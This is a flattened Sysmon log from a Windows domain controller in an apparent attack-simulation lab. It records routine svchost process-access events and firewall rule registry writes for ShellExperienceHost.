13:58:21.742{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010654Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.742{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010653Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.727{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010652Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.727{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010651Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.727{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010650Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.727{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010649Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.727{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010648Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.727{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010647Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.727{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010646Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.727{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010645Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.727{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010644Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.727{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010643Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.727{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010642Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.727{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010641Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.727{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010640Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.727{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010639Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.711{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000010638Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:21.696{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708S-1-5-21-2311372046-1276363322-545193238-500v2.26|AppPkgId=S-1-15-2-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|C=S-1-15-3-1|C=S-1-15-3-4|C=S-1-15-3-15993189-1149757597-3280441496-4094800555|C=S-1-15-3-139472938-1339732804-1469114779-4031155563|C=S-1-15-3-1849407097-1086866290-155560606-3624675039|C=S-1-15-3-2015030808-1290041139-4103196845-2461361948|C=S-1-15-3-2973957182-1175190094-721927306-1883016034|C=S-1-15-3-3633849274-1266774400-1199443125-2736873758|C=S-1-15-3-2105443330-1210154068-4021178019-2481794518|C=S-1-15-3-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708|M=microsoft.windows.shellexperiencehost_cw5n1h2txyewy|Name=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|Desc=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|D=C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\|PFN=Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy| 13241300x800000000000000010637Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:21.680{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{36AFAECD-731F-4EAB-BF8E-26ABBDB9CF37}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|Desc=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708|EmbedCtxt=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|Platform=2:6:2|Platform2=GTEQ| 13241300x800000000000000010636Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:21.680{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{CBB5B569-0FDA-4B3E-A63F-0B00D1CA8690}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|Desc=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708|EmbedCtxt=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}| 13241300x800000000000000010635Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:21.680{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{D197064B-AC84-4E6B-A5DF-2CEEA8695ECB}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|Desc=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708|EmbedCtxt=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}| 13241300x800000000000000010634Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:21.680{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{241621E7-724D-43AE-A312-0FD919C62C19}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|Desc=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708|EmbedCtxt=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}| 10341000x800000000000000010633Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.664{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010632Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 